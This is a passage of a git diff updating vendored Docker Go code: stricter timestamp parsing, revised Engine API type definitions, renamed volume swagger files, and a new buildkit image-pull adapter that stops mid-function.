@@ -29,10 +29,8 @@ func GetTimestamp(value string, reference time.Time) (string, error) {
 	}
 
 	var format string
-	var parseInLocation bool
-
 	// if the string has a Z or a + or three dashes use parse otherwise use parseinlocation
-	parseInLocation = !(strings.ContainsAny(value, "zZ+") || strings.Count(value, "-") == 3)
+	parseInLocation := !(strings.ContainsAny(value, "zZ+") || strings.Count(value, "-") == 3)
 
 	if strings.Contains(value, ".") {
 		if parseInLocation {
@@ -84,11 +82,14 @@ func GetTimestamp(value string, reference time.Time) (string, error) {
 	}
 
 	if err != nil {
-		// if there is a `-` then its an RFC3339 like timestamp otherwise assume unixtimestamp
+		// if there is a `-` then it's an RFC3339 like timestamp
 		if strings.Contains(value, "-") {
 			return "", err // was probably an RFC3339 like timestamp but the parser failed with an error
 		}
-		return value, nil // unixtimestamp in and out case (meaning: the value passed at the command line is already in the right format for passing to the server)
+		if _, _, err := parseTimestamp(value); err != nil {
+			return "", fmt.Errorf("failed to parse value as time or duration: %q", value)
+		}
+		return value, nil // unix timestamp in and out case (meaning: the value passed at the command line is already in the right format for passing to the server)
 	}
 
 	return fmt.Sprintf("%d.%09d", t.Unix(), int64(t.Nanosecond())), nil
@@ -106,6 +107,10 @@ func ParseTimestamps(value string, def int64) (int64, int64, error) {
 	if value == "" {
 		return def, 0, nil
 	}
+	return parseTimestamp(value)
+}
+
+func parseTimestamp(value string) (int64, int64, error) {
 	sa := strings.SplitN(value, ".", 2)
 	s, err := strconv.ParseInt(sa[0], 10, 64)
 	if err != nil {
@@ -118,7 +123,7 @@ func ParseTimestamps(value string, def int64) (int64, int64, error) {
 	if err != nil {
 		return s, n, err
 	}
-	// should already be in nanoseconds but just in case convert n to nanoseonds
+	// should already be in nanoseconds but just in case convert n to nanoseconds
 	n = int64(float64(n) * math.Pow(float64(10), float64(9-len(sa[1]))))
 	return s, n, nil
 }
diff --git a/vendor/github.com/docker/docker/api/types/time/timestamp_test.go b/vendor/github.com/docker/docker/api/types/time/timestamp_test.go
index a1651309d7..2535d895c6 100644
--- a/vendor/github.com/docker/docker/api/types/time/timestamp_test.go
+++ b/vendor/github.com/docker/docker/api/types/time/timestamp_test.go
@@ -1,4 +1,4 @@
-package time
+package time // import "github.com/docker/docker/api/types/time"
 
 import (
 	"fmt"
@@ -49,8 +49,8 @@ func TestGetTimestamp(t *testing.T) {
 		{"1.5h", fmt.Sprintf("%d", now.Add(-90*time.Minute).Unix()), false},
 		{"1h30m", fmt.Sprintf("%d", now.Add(-90*time.Minute).Unix()), false},
 
-		// String fallback
-		{"invalid", "invalid", false},
+		{"invalid", "", true},
+		{"", "", true},
 	}
 
 	for _, c := range cases {
diff --git a/vendor/github.com/docker/docker/api/types/types.go b/vendor/github.com/docker/docker/api/types/types.go
index a82c3e88ef..06c0ca3a69 100644
--- a/vendor/github.com/docker/docker/api/types/types.go
+++ b/vendor/github.com/docker/docker/api/types/types.go
@@ -1,4 +1,4 @@
-package types
+package types // import "github.com/docker/docker/api/types"
 
 import (
 	"errors"
@@ -17,38 +17,6 @@ import (
 	"github.com/docker/go-connections/nat"
 )
 
-// ContainerChange contains response of Engine API:
-// GET "/containers/{name:.*}/changes"
-type ContainerChange struct {
-	Kind int
-	Path string
-}
-
-// ImageHistory contains response of Engine API:
-// GET "/images/{name:.*}/history"
-type ImageHistory struct {
-	ID        string `json:"Id"`
-	Created   int64
-	CreatedBy string
-	Tags      []string
-	Size      int64
-	Comment   string
-}
-
-// ImageDelete contains response of Engine API:
-// DELETE "/images/{name:.*}"
-type ImageDelete struct {
-	Untagged string `json:",omitempty"`
-	Deleted  string `json:",omitempty"`
-}
-
-// GraphDriverData returns Image's graph driver config info
-// when calling inspect command
-type GraphDriverData struct {
-	Name string
-	Data map[string]string
-}
-
 // RootFS returns Image's RootFS description including the layer IDs.
 type RootFS struct {
 	Type      string
@@ -77,6 +45,12 @@ type ImageInspect struct {
 	VirtualSize     int64
 	GraphDriver     GraphDriverData
 	RootFS          RootFS
+	Metadata        ImageMetadata
+}
+
+// ImageMetadata contains engine-local data about the image
+type ImageMetadata struct {
+	LastTagTime time.Time `json:",omitempty"`
 }
 
 // Container contains response of Engine API:
@@ -125,23 +99,29 @@ type ContainerStats struct {
 	OSType string        `json:"ostype"`
 }
 
-// ContainerProcessList contains response of Engine API:
-// GET "/containers/{name:.*}/top"
-type ContainerProcessList struct {
-	Processes [][]string
-	Titles    []string
-}
-
 // Ping contains response of Engine API:
 // GET "/_ping"
 type Ping struct {
 	APIVersion   string
+	OSType       string
 	Experimental bool
 }
 
+// ComponentVersion describes the version information for a specific component.
+type ComponentVersion struct {
+	Name    string
+	Version string
+	Details map[string]string `json:",omitempty"`
+}
+
 // Version contains response of Engine API:
 // GET "/version"
 type Version struct {
+	Platform   struct{ Name string } `json:",omitempty"`
+	Components []ComponentVersion    `json:",omitempty"`
+
+	// The following fields are deprecated, they relate to the Engine component and are kept for backwards compatibility
+
 	Version       string
 	APIVersion    string `json:"ApiVersion"`
 	MinAPIVersion string `json:"MinAPIVersion,omitempty"`
@@ -154,11 +134,11 @@ type Version struct {
 	BuildTime     string `json:",omitempty"`
 }
 
-// Commit records a external tool actual commit id version along the
-// one expect by dockerd as set at build time
+// Commit holds the Git-commit (SHA1) that a binary was built from, as reported
+// in the version-string of external tools, such as containerd, or runC.
 type Commit struct {
-	ID       string
-	Expected string
+	ID       string // ID is the actual commit ID of external tool.
+	Expected string // Expected is the commit ID of external tool expected by dockerd as set at build time.
 }
 
 // Info contains response of Engine API:
@@ -200,6 +180,7 @@ type Info struct {
 	RegistryConfig     *registry.ServiceConfig
 	NCPU               int
 	MemTotal           int64
+	GenericResources   []swarm.GenericResource
 	DockerRootDir      string
 	HTTPProxy          string `json:"HttpProxy"`
 	HTTPSProxy         string `json:"HttpsProxy"`
@@ -276,6 +257,8 @@ type PluginsInfo struct {
 	Network []string
 	// List of Authorization plugins registered
 	Authorization []string
+	// List of Log plugins registered
+	Log []string
 }
 
 // ExecStartCheck is a temp struct used by execStart
@@ -313,7 +296,7 @@ type Health struct {
 // ContainerState stores container's running state
 // it's part of ContainerJSONBase and will return by "inspect" command
 type ContainerState struct {
-	Status     string
+	Status     string // String representation of the container state. Can be one of "created", "running", "paused", "restarting", "removing", "exited", or "dead"
 	Running    bool
 	Paused     bool
 	Restarting bool
@@ -356,6 +339,7 @@ type ContainerJSONBase struct {
 	Name            string
 	RestartCount    int
 	Driver          string
+	Platform        string
 	MountLabel      string
 	ProcessLabel    string
 	AppArmorProfile string
@@ -429,19 +413,23 @@ type MountPoint struct {
 
 // NetworkResource is the body of the "get network" http response message
 type NetworkResource struct {
-	Name       string                      // Name is the requested name of the network
-	ID         string                      `json:"Id"` // ID uniquely identifies a network on a single machine
-	Created    time.Time                   // Created is the time the network created
-	Scope      string                      // Scope describes the level at which the network exists (e.g. `global` for cluster-wide or `local` for machine level)
-	Driver     string                      // Driver is the Driver name used to create the network (e.g. `bridge`, `overlay`)
-	EnableIPv6 bool                        // EnableIPv6 represents whether to enable IPv6
-	IPAM       network.IPAM                // IPAM is the network's IP Address Management
-	Internal   bool                        // Internal represents if the network is used internal only
-	Attachable bool                        // Attachable represents if the global scope is manually attachable by regular containers from workers in swarm mode.
-	Containers map[string]EndpointResource // Containers contains endpoints belonging to the network
-	Options    map[string]string           // Options holds the network specific options to use for when creating the network
-	Labels     map[string]string           // Labels holds metadata specific to the network being created
-	Peers      []network.PeerInfo          `json:",omitempty"` // List of peer nodes for an overlay network
+	Name       string                         // Name is the requested name of the network
+	ID         string                         `json:"Id"` // ID uniquely identifies a network on a single machine
+	Created    time.Time                      // Created is the time the network created
+	Scope      string                         // Scope describes the level at which the network exists (e.g. `swarm` for cluster-wide or `local` for machine level)
+	Driver     string                         // Driver is the Driver name used to create the network (e.g. `bridge`, `overlay`)
+	EnableIPv6 bool                           // EnableIPv6 represents whether to enable IPv6
+	IPAM       network.IPAM                   // IPAM is the network's IP Address Management
+	Internal   bool                           // Internal represents if the network is used internal only
+	Attachable bool                           // Attachable represents if the global scope is manually attachable by regular containers from workers in swarm mode.
+	Ingress    bool                           // Ingress indicates the network is providing the routing-mesh for the swarm cluster.
+	ConfigFrom network.ConfigReference        // ConfigFrom specifies the source which will provide the configuration for this network.
+	ConfigOnly bool                           // ConfigOnly networks are place-holder networks for network configurations to be used by other networks. ConfigOnly networks cannot be used directly to run containers or services.
+	Containers map[string]EndpointResource    // Containers contains endpoints belonging to the network
+	Options    map[string]string              // Options holds the network specific options to use for when creating the network
+	Labels     map[string]string              // Labels holds metadata specific to the network being created
+	Peers      []network.PeerInfo             `json:",omitempty"` // List of peer nodes for an overlay network
+	Services   map[string]network.ServiceInfo `json:",omitempty"`
 }
 
 // EndpointResource contains network resources allocated and used for a container in a network
@@ -455,12 +443,23 @@ type EndpointResource struct {
 
 // NetworkCreate is the expected body of the "create network" http request message
 type NetworkCreate struct {
+	// Check for networks with duplicate names.
+	// Network is primarily keyed based on a random ID and not on the name.
+	// Network name is strictly a user-friendly alias to the network
+	// which is uniquely identified using ID.
+	// And there is no guaranteed way to check for duplicates.
+	// Option CheckDuplicate is there to provide a best effort checking of any networks
+	// which has the same name but it is not guaranteed to catch all name collisions.
 	CheckDuplicate bool
 	Driver         string
+	Scope          string
 	EnableIPv6     bool
 	IPAM           *network.IPAM
 	Internal       bool
 	Attachable     bool
+	Ingress        bool
+	ConfigOnly     bool
+	ConfigFrom     *network.ConfigReference
 	Options        map[string]string
 	Labels         map[string]string
 }
@@ -489,6 +488,12 @@ type NetworkDisconnect struct {
 	Force     bool
 }
 
+// NetworkInspectOptions holds parameters to inspect network
+type NetworkInspectOptions struct {
+	Scope   string
+	Verbose bool
+}
+
 // Checkpoint represents the details of a checkpoint
 type Checkpoint struct {
 	Name string // Name is the name of the checkpoint
@@ -503,10 +508,12 @@ type Runtime struct {
 // DiskUsage contains response of Engine API:
 // GET "/system/df"
 type DiskUsage struct {
-	LayersSize int64
-	Images     []*ImageSummary
-	Containers []*Container
-	Volumes    []*Volume
+	LayersSize  int64
+	Images      []*ImageSummary
+	Containers  []*Container
+	Volumes     []*Volume
+	BuildCache  []*BuildCache
+	BuilderSize int64 // deprecated
 }
 
 // ContainersPruneReport contains the response for Engine API:
@@ -526,7 +533,13 @@ type VolumesPruneReport struct {
 // ImagesPruneReport contains the response for Engine API:
 // POST "/images/prune"
 type ImagesPruneReport struct {
-	ImagesDeleted  []ImageDelete
+	ImagesDeleted  []ImageDeleteResponseItem
+	SpaceReclaimed uint64
+}
+
+// BuildCachePruneReport contains the response for Engine API:
+// POST "/build/prune"
+type BuildCachePruneReport struct {
 	SpaceReclaimed uint64
 }
 
@@ -547,3 +560,43 @@ type SecretCreateResponse struct {
 type SecretListOptions struct {
 	Filters filters.Args
 }
+
+// ConfigCreateResponse contains the information returned to a client
+// on the creation of a new config.
+type ConfigCreateResponse struct {
+	// ID is the id of the created config.
+	ID string
+}
+
+// ConfigListOptions holds parameters to list configs
+type ConfigListOptions struct {
+	Filters filters.Args
+}
+
+// PushResult contains the tag, manifest digest, and manifest size from the
+// push. It's used to signal this information to the trust code in the client
+// so it can sign the manifest if necessary.
+type PushResult struct {
+	Tag    string
+	Digest string
+	Size   int
+}
+
+// BuildResult contains the image id of a successful build
+type BuildResult struct {
+	ID string
+}
+
+// BuildCache contains information about a build cache record
+type BuildCache struct {
+	ID      string
+	Mutable bool
+	InUse   bool
+	Size    int64
+
+	CreatedAt   time.Time
+	LastUsedAt  *time.Time
+	UsageCount  int
+	Parent      string
+	Description string
+}
diff --git a/vendor/github.com/docker/docker/api/types/versions/README.md b/vendor/github.com/docker/docker/api/types/versions/README.md
index cdac50a53c..1ef911edb0 100644
--- a/vendor/github.com/docker/docker/api/types/versions/README.md
+++ b/vendor/github.com/docker/docker/api/types/versions/README.md
@@ -1,10 +1,10 @@
-## Legacy API type versions
+# Legacy API type versions
 
 This package includes types for legacy API versions. The stable version of the API types live in `api/types/*.go`.
 
 Consider moving a type here when you need to keep backwards compatibility in the API. This legacy types are organized by the latest API version they appear in. For instance, types in the `v1p19` package are valid for API versions below or equal `1.19`. Types in the `v1p20` package are valid for the API version `1.20`, since the versions below that will use the legacy types in `v1p19`.
 
-### Package name conventions
+## Package name conventions
 
 The package name convention is to use `v` as a prefix for the version number and `p`(patch) as a separator. We use this nomenclature due to a few restrictions in the Go package name convention:
 
diff --git a/vendor/github.com/docker/docker/api/types/versions/compare.go b/vendor/github.com/docker/docker/api/types/versions/compare.go
index 611d4fed66..8ccb0aa92e 100644
--- a/vendor/github.com/docker/docker/api/types/versions/compare.go
+++ b/vendor/github.com/docker/docker/api/types/versions/compare.go
@@ -1,4 +1,4 @@
-package versions
+package versions // import "github.com/docker/docker/api/types/versions"
 
 import (
 	"strconv"
diff --git a/vendor/github.com/docker/docker/api/types/versions/compare_test.go b/vendor/github.com/docker/docker/api/types/versions/compare_test.go
index c2b96869f7..185e37c159 100644
--- a/vendor/github.com/docker/docker/api/types/versions/compare_test.go
+++ b/vendor/github.com/docker/docker/api/types/versions/compare_test.go
@@ -1,4 +1,4 @@
-package versions
+package versions // import "github.com/docker/docker/api/types/versions"
 
 import (
 	"testing"
diff --git a/vendor/github.com/docker/docker/api/types/versions/v1p19/types.go b/vendor/github.com/docker/docker/api/types/versions/v1p19/types.go
index dc13150545..58afe32da0 100644
--- a/vendor/github.com/docker/docker/api/types/versions/v1p19/types.go
+++ b/vendor/github.com/docker/docker/api/types/versions/v1p19/types.go
@@ -1,5 +1,5 @@
 // Package v1p19 provides specific API types for the API version 1, patch 19.
-package v1p19
+package v1p19 // import "github.com/docker/docker/api/types/versions/v1p19"
 
 import (
 	"github.com/docker/docker/api/types"
diff --git a/vendor/github.com/docker/docker/api/types/versions/v1p20/types.go b/vendor/github.com/docker/docker/api/types/versions/v1p20/types.go
index 94a06d7452..cc7277b1b4 100644
--- a/vendor/github.com/docker/docker/api/types/versions/v1p20/types.go
+++ b/vendor/github.com/docker/docker/api/types/versions/v1p20/types.go
@@ -1,5 +1,5 @@
 // Package v1p20 provides specific API types for the API version 1, patch 20.
-package v1p20
+package v1p20 // import "github.com/docker/docker/api/types/versions/v1p20"
 
 import (
 	"github.com/docker/docker/api/types"
diff --git a/vendor/github.com/docker/docker/api/types/volume.go b/vendor/github.com/docker/docker/api/types/volume.go
index da4f8ebd9c..b5ee96a500 100644
--- a/vendor/github.com/docker/docker/api/types/volume.go
+++ b/vendor/github.com/docker/docker/api/types/volume.go
@@ -7,6 +7,9 @@ package types
 // swagger:model Volume
 type Volume struct {
 
+	// Date/Time the volume was created.
+	CreatedAt string `json:"CreatedAt,omitempty"`
+
 	// Name of the volume driver used by the volume.
 	// Required: true
 	Driver string `json:"Driver"`
@@ -44,15 +47,23 @@ type Volume struct {
 	UsageData *VolumeUsageData `json:"UsageData,omitempty"`
 }
 
-// VolumeUsageData volume usage data
+// VolumeUsageData Usage details about the volume. This information is used by the
+// `GET /system/df` endpoint, and omitted in other endpoints.
+//
 // swagger:model VolumeUsageData
 type VolumeUsageData struct {
 
-	// The number of containers referencing this volume.
+	// The number of containers referencing this volume. This field
+	// is set to `-1` if the reference-count is not available.
+	//
 	// Required: true
 	RefCount int64 `json:"RefCount"`
 
-	// The disk space used by the volume (local driver only)
+	// Amount of disk space used by the volume (in bytes). This information
+	// is only available for volumes created with the `"local"` volume
+	// driver. For volumes created with other volume drivers, this field
+	// is set to `-1` ("not available")
+	//
 	// Required: true
 	Size int64 `json:"Size"`
 }
diff --git a/vendor/github.com/docker/docker/api/types/volume/volumes_create.go b/vendor/github.com/docker/docker/api/types/volume/volume_create.go
similarity index 84%
rename from vendor/github.com/docker/docker/api/types/volume/volumes_create.go
rename to vendor/github.com/docker/docker/api/types/volume/volume_create.go
index 679c16006f..539e9b97d9 100644
--- a/vendor/github.com/docker/docker/api/types/volume/volumes_create.go
+++ b/vendor/github.com/docker/docker/api/types/volume/volume_create.go
@@ -4,12 +4,12 @@ package volume
 // DO NOT EDIT THIS FILE
 // This file was generated by `swagger generate operation`
 //
-// See hack/swagger-gen.sh
+// See hack/generate-swagger-api.sh
 // ----------------------------------------------------------------------------
 
-// VolumesCreateBody volumes create body
-// swagger:model VolumesCreateBody
-type VolumesCreateBody struct {
+// VolumeCreateBody
+// swagger:model VolumeCreateBody
+type VolumeCreateBody struct {
 
 	// Name of the volume driver to use.
 	// Required: true
diff --git a/vendor/github.com/docker/docker/api/types/volume/volumes_list.go b/vendor/github.com/docker/docker/api/types/volume/volume_list.go
similarity index 78%
rename from vendor/github.com/docker/docker/api/types/volume/volumes_list.go
rename to vendor/github.com/docker/docker/api/types/volume/volume_list.go
index 7770bcb8fc..1bb279dbb3 100644
--- a/vendor/github.com/docker/docker/api/types/volume/volumes_list.go
+++ b/vendor/github.com/docker/docker/api/types/volume/volume_list.go
@@ -4,14 +4,14 @@ package volume
 // DO NOT EDIT THIS FILE
 // This file was generated by `swagger generate operation`
 //
-// See hack/swagger-gen.sh
+// See hack/generate-swagger-api.sh
 // ----------------------------------------------------------------------------
 
 import "github.com/docker/docker/api/types"
 
-// VolumesListOKBody volumes list o k body
-// swagger:model VolumesListOKBody
-type VolumesListOKBody struct {
+// VolumeListOKBody
+// swagger:model VolumeListOKBody
+type VolumeListOKBody struct {
 
 	// List of volumes
 	// Required: true
diff --git a/vendor/github.com/docker/docker/builder/builder-next/adapters/containerimage/pull.go b/vendor/github.com/docker/docker/builder/builder-next/adapters/containerimage/pull.go
new file mode 100644
index 0000000000..b84d2e8589
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/builder-next/adapters/containerimage/pull.go
@@ -0,0 +1,724 @@
+package containerimage
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"runtime"
+	"sync"
+	"time"
+
+	"github.com/containerd/containerd/content"
+	"github.com/containerd/containerd/errdefs"
+	"github.com/containerd/containerd/images"
+	"github.com/containerd/containerd/platforms"
+	ctdreference "github.com/containerd/containerd/reference"
+	"github.com/containerd/containerd/remotes"
+	"github.com/containerd/containerd/remotes/docker"
+	"github.com/containerd/containerd/remotes/docker/schema1"
+	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/docker/distribution"
+	"github.com/docker/docker/distribution/metadata"
+	"github.com/docker/docker/distribution/xfer"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	pkgprogress "github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/reference"
+	"github.com/moby/buildkit/cache"
+	"github.com/moby/buildkit/session"
+	"github.com/moby/buildkit/session/auth"
+	"github.com/moby/buildkit/source"
+	"github.com/moby/buildkit/util/flightcontrol"
+	"github.com/moby/buildkit/util/imageutil"
+	"github.com/moby/buildkit/util/progress"
+	"github.com/moby/buildkit/util/tracing"
+	digest "github.com/opencontainers/go-digest"
+	"github.com/opencontainers/image-spec/identity"
+	ocispec "github.com/opencontainers/image-spec/specs-go/v1"
+	"github.com/pkg/errors"
+	"golang.org/x/time/rate"
+)
+
+const preferLocal = true // FIXME: make this optional from the op
+
+// SourceOpt is options for creating the image source
+type SourceOpt struct {
+	SessionManager  *session.Manager
+	ContentStore    content.Store
+	CacheAccessor   cache.Accessor
+	ReferenceStore  reference.Store
+	DownloadManager distribution.RootFSDownloadManager
+	MetadataStore   metadata.V2MetadataService
+	ImageStore      image.Store
+}
+
+type imageSource struct {
+	SourceOpt
+	g flightcontrol.Group
+}
+
+// NewSource creates a new image source
+func NewSource(opt SourceOpt) (source.Source, error) {
+	is := &imageSource{
+		SourceOpt: opt,
+	}
+
+	return is, nil
+}
+
+func (is *imageSource) ID() string {
+	return source.DockerImageScheme
+}
+
+func (is *imageSource) getResolver(ctx context.Context) remotes.Resolver {
+	return docker.NewResolver(docker.ResolverOptions{
+		Client:      tracing.DefaultClient,
+		Credentials: is.getCredentialsFromSession(ctx),
+	})
+}
+
+func (is *imageSource) getCredentialsFromSession(ctx context.Context) func(string) (string, string, error) {
+	id := session.FromContext(ctx)
+	if id == "" {
+		return nil
+	}
+	return func(host string) (string, string, error) {
+		timeoutCtx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+		defer cancel()
+
+		caller, err := is.SessionManager.Get(timeoutCtx, id)
+		if err != nil {
+			return "", "", err
+		}
+
+		return auth.CredentialsFunc(tracing.ContextWithSpanFromContext(context.TODO(), ctx), caller)(host)
+	}
+}
+
+func (is *imageSource) resolveLocal(refStr string) ([]byte, error) {
+	ref, err := distreference.ParseNormalizedNamed(refStr)
+	if err != nil {
+		return nil, err
+	}
+	dgst, err := is.ReferenceStore.Get(ref)
+	if err != nil {
+		return nil, err
+	}
+	img, err := is.ImageStore.Get(image.ID(dgst))
+	if err != nil {
+		return nil, err
+	}
+	return img.RawJSON(), nil
+}
+
+func (is *imageSource) ResolveImageConfig(ctx context.Context, ref string) (digest.Digest, []byte, error) {
+	if preferLocal {
+		dt, err := is.resolveLocal(ref)
+		if err == nil {
+			return "", dt, nil
+		}
+	}
+
+	type t struct {
+		dgst digest.Digest
+		dt   []byte
+	}
+	res, err := is.g.Do(ctx, ref, func(ctx context.Context) (interface{}, error) {
+		dgst, dt, err := imageutil.Config(ctx, ref, is.getResolver(ctx), is.ContentStore, "")
+		if err != nil {
+			return nil, err
+		}
+		return &t{dgst: dgst, dt: dt}, nil
+	})
+	if err != nil {
+		return "", nil, err
+	}
+	typed := res.(*t)
+	return typed.dgst, typed.dt, nil
+}
+
+func (is *imageSource) Resolve(ctx context.Context, id source.Identifier) (source.SourceInstance, error) {
+	imageIdentifier, ok := id.(*source.ImageIdentifier)
+	if !ok {
+		return nil, errors.Errorf("invalid image identifier %v", id)
+	}
+
+	p := &puller{
+		src:      imageIdentifier,
+		is:       is,
+		resolver: is.getResolver(ctx),
+	}
+	return p, nil
+}
+
+type puller struct {
+	is               *imageSource
+	resolveOnce      sync.Once
+	resolveLocalOnce sync.Once
+	src              *source.ImageIdentifier
+	desc             ocispec.Descriptor
+	ref              string
+	resolveErr       error
+	resolver         remotes.Resolver
+	config           []byte
+}
+
+func (p *puller) mainManifestKey(dgst digest.Digest) (digest.Digest, error) {
+	dt, err := json.Marshal(struct {
+		Digest digest.Digest
+		OS     string
+		Arch   string
+	}{
+		Digest: p.desc.Digest,
+		OS:     runtime.GOOS,
+		Arch:   runtime.GOARCH,
+	})
+	if err != nil {
+		return "", err
+	}
+	return digest.FromBytes(dt), nil
+}
+
+func (p *puller) resolveLocal() {
+	p.resolveLocalOnce.Do(func() {
+		dgst := p.src.Reference.Digest()
+		if dgst != "" {
+			info, err := p.is.ContentStore.Info(context.TODO(), dgst)
+			if err == nil {
+				p.ref = p.src.Reference.String()
+				desc := ocispec.Descriptor{
+					Size:   info.Size,
+					Digest: dgst,
+				}
+				ra, err := p.is.ContentStore.ReaderAt(context.TODO(), desc)
+				if err == nil {
+					mt, err := imageutil.DetectManifestMediaType(ra)
+					if err == nil {
+						desc.MediaType = mt
+						p.desc = desc
+					}
+				}
+			}
+		}
+
+		if preferLocal {
+			dt, err := p.is.resolveLocal(p.src.Reference.String())
+			if err == nil {
+				p.config = dt
+			}
+		}
+	})
+}
+
+func (p *puller) resolve(ctx context.Context) error {
+	p.resolveOnce.Do(func() {
+		resolveProgressDone := oneOffProgress(ctx, "resolve "+p.src.Reference.String())
+
+		ref, err := distreference.ParseNormalizedNamed(p.src.Reference.String())
+		if err != nil {
+			p.resolveErr = err
+			resolveProgressDone(err)
+			return
+		}
+
+		if p.desc.Digest == "" && p.config == nil {
+			origRef, desc, err := p.resolver.Resolve(ctx, ref.String())
+			if err != nil {
+				p.resolveErr = err
+				resolveProgressDone(err)
+				return
+			}
+
+			p.desc = desc
+			p.ref = origRef
+		}
+
+		// Schema 1 manifests cannot be resolved to an image config
+		// since the conversion must take place after all the content
+		// has been read.
+		// It may be possible to have a mapping between schema 1 manifests
+		// and the schema 2 manifests they are converted to.
+		if p.config == nil && p.desc.MediaType != images.MediaTypeDockerSchema1Manifest {
+			ref, err := distreference.WithDigest(ref, p.desc.Digest)
+			if err != nil {
+				p.resolveErr = err
+				resolveProgressDone(err)
+				return
+			}
+
+			_, dt, err := p.is.ResolveImageConfig(ctx, ref.String())
+			if err != nil {
+				p.resolveErr = err
+				resolveProgressDone(err)
+				return
+			}
+
+			p.config = dt
+		}
+		resolveProgressDone(nil)
+	})
+	return p.resolveErr
+}
+
+func (p *puller) CacheKey(ctx context.Context, index int) (string, bool, error) {
+	p.resolveLocal()
+
+	if p.desc.Digest != "" && index == 0 {
+		dgst, err := p.mainManifestKey(p.desc.Digest)
+		if err != nil {
+			return "", false, err
+		}
+		return dgst.String(), false, nil
+	}
+
+	if p.config != nil {
+		return cacheKeyFromConfig(p.config).String(), true, nil
+	}
+
+	if err := p.resolve(ctx); err != nil {
+		return "", false, err
+	}
+
+	if p.desc.Digest != "" && index == 0 {
+		dgst, err := p.mainManifestKey(p.desc.Digest)
+		if err != nil {
+			return "", false, err
+		}
+		return dgst.String(), false, nil
+	}
+
+	return cacheKeyFromConfig(p.config).String(), true, nil
+}
+
+func (p *puller) Snapshot(ctx context.Context) (cache.ImmutableRef, error) {
+	p.resolveLocal()
+	if err := p.resolve(ctx); err != nil {
+		return nil, err
+	}
+
+	if p.config != nil {
+		img, err := p.is.ImageStore.Get(image.ID(digest.FromBytes(p.config)))
+		if err == nil {
+			if len(img.RootFS.DiffIDs) == 0 {
+				return nil, nil
+			}
+			ref, err := p.is.CacheAccessor.GetFromSnapshotter(ctx, string(img.RootFS.ChainID()), cache.WithDescription(fmt.Sprintf("from local %s", p.ref)))
+			if err != nil {
+				return nil, err
+			}
+			return ref, nil
+		}
+	}
+
+	ongoing := newJobs(p.ref)
+
+	pctx, stopProgress := context.WithCancel(ctx)
+
+	pw, _, ctx := progress.FromContext(ctx)
+	defer pw.Close()
+
+	progressDone := make(chan struct{})
+	go func() {
+		showProgress(pctx, ongoing, p.is.ContentStore, pw)
+		close(progressDone)
+	}()
+	defer func() {
+		<-progressDone
+	}()
+
+	fetcher, err := p.resolver.Fetcher(ctx, p.ref)
+	if err != nil {
+		stopProgress()
+		return nil, err
+	}
+
+	var (
+		schema1Converter *schema1.Converter
+		handlers         []images.Handler
+	)
+	if p.desc.MediaType == images.MediaTypeDockerSchema1Manifest {
+		schema1Converter = schema1.NewConverter(p.is.ContentStore, fetcher)
+		handlers = append(handlers, schema1Converter)
+
+		// TODO: Optimize to do dispatch and integrate pulling with download manager,
+		// leverage existing blob mapping and layer storage
+	} else {
+
+		// TODO: need a wrapper snapshot interface that combines content
+		// and snapshots as 1) buildkit shouldn't have a dependency on contentstore
+		// or 2) cachemanager should manage the contentstore
+		handlers = append(handlers, images.HandlerFunc(func(ctx context.Context, desc ocispec.Descriptor) ([]ocispec.Descriptor, error) {
+			switch desc.MediaType {
+			case images.MediaTypeDockerSchema2Manifest, ocispec.MediaTypeImageManifest,
+				images.MediaTypeDockerSchema2ManifestList, ocispec.MediaTypeImageIndex,
+				images.MediaTypeDockerSchema2Config, ocispec.MediaTypeImageConfig:
+			default:
+				return nil, images.ErrSkipDesc
+			}
+			ongoing.add(desc)
+			return nil, nil
+		}))
+
+		// Get all the children for a descriptor
+		childrenHandler := images.ChildrenHandler(p.is.ContentStore)
+		// Set any children labels for that content
+		childrenHandler = images.SetChildrenLabels(p.is.ContentStore, childrenHandler)
+		// Filter the childen by the platform
+		childrenHandler = images.FilterPlatforms(childrenHandler, platforms.Default())
+
+		handlers = append(handlers,
+			remotes.FetchHandler(p.is.ContentStore, fetcher),
+			childrenHandler,
+		)
+	}
+
+	if err := images.Dispatch(ctx, images.Handlers(handlers...), p.desc); err != nil {
+		stopProgress()
+		return nil, err
+	}
+	defer stopProgress()
+
+	if schema1Converter != nil {
+		p.desc, err = schema1Converter.Convert(ctx)
+		if err != nil {
+			return nil, err
+		}
+	}
+
+	mfst, err := images.Manifest(ctx, p.is.ContentStore, p.desc, platforms.Default())
+	if err != nil {
+		return nil, err
+	}
+
+	config, err := images.Config(ctx, p.is.ContentStore, p.desc, platforms.Default())
+	if err != nil {
+		return nil, err
+	}
+
+	dt, err := content.ReadBlob(ctx, p.is.ContentStore, config)
+	if err != nil {
+		return nil, err
+	}
+
+	var img ocispec.Image
+	if err := json.Unmarshal(dt, &img); err != nil {
+		return nil, err
+	}
+
+	if len(mfst.Layers) != len(img.RootFS.DiffIDs) {
+		return nil, errors.Errorf("invalid config for manifest")
+	}
+
+	pchan := make(chan pkgprogress.Progress, 10)
+	defer close(pchan)
+
+	go func() {
+		m := map[string]struct {
+			st      time.Time
+			limiter *rate.Limiter
+		}{}
+		for p := range pchan {
+			if p.Action == "Extracting" {
+				st, ok := m[p.ID]
+				if !ok {
+					st.st = time.Now()
+					st.limiter = rate.NewLimiter(rate.Every(100*time.Millisecond), 1)
+					m[p.ID] = st
+				}
+				var end *time.Time
+				if p.LastUpdate || st.limiter.Allow() {
+					if p.LastUpdate {
+						tm := time.Now()
+						end = &tm
+					}
+					pw.Write("extracting "+p.ID, progress.Status{
+						Action:    "extract",
+						Started:   &st.st,
+						Completed: end,
+					})
+				}
+			}
+		}
+	}()
+
+	if len(mfst.Layers) == 0 {
+		return nil, nil
+	}
+
+	layers := make([]xfer.DownloadDescriptor, 0, len(mfst.Layers))
+
+	for i, desc := range mfst.Layers {
+		ongoing.add(desc)
+		layers = append(layers, &layerDescriptor{
+			desc:    desc,
+			diffID:  layer.DiffID(img.RootFS.DiffIDs[i]),
+			fetcher: fetcher,
+			ref:     p.src.Reference,
+			is:      p.is,
+		})
+	}
+
+	defer func() {
+		<-progressDone
+		for _, desc := range mfst.Layers {
+			p.is.ContentStore.Delete(context.TODO(), desc.Digest)
+		}
+	}()
+
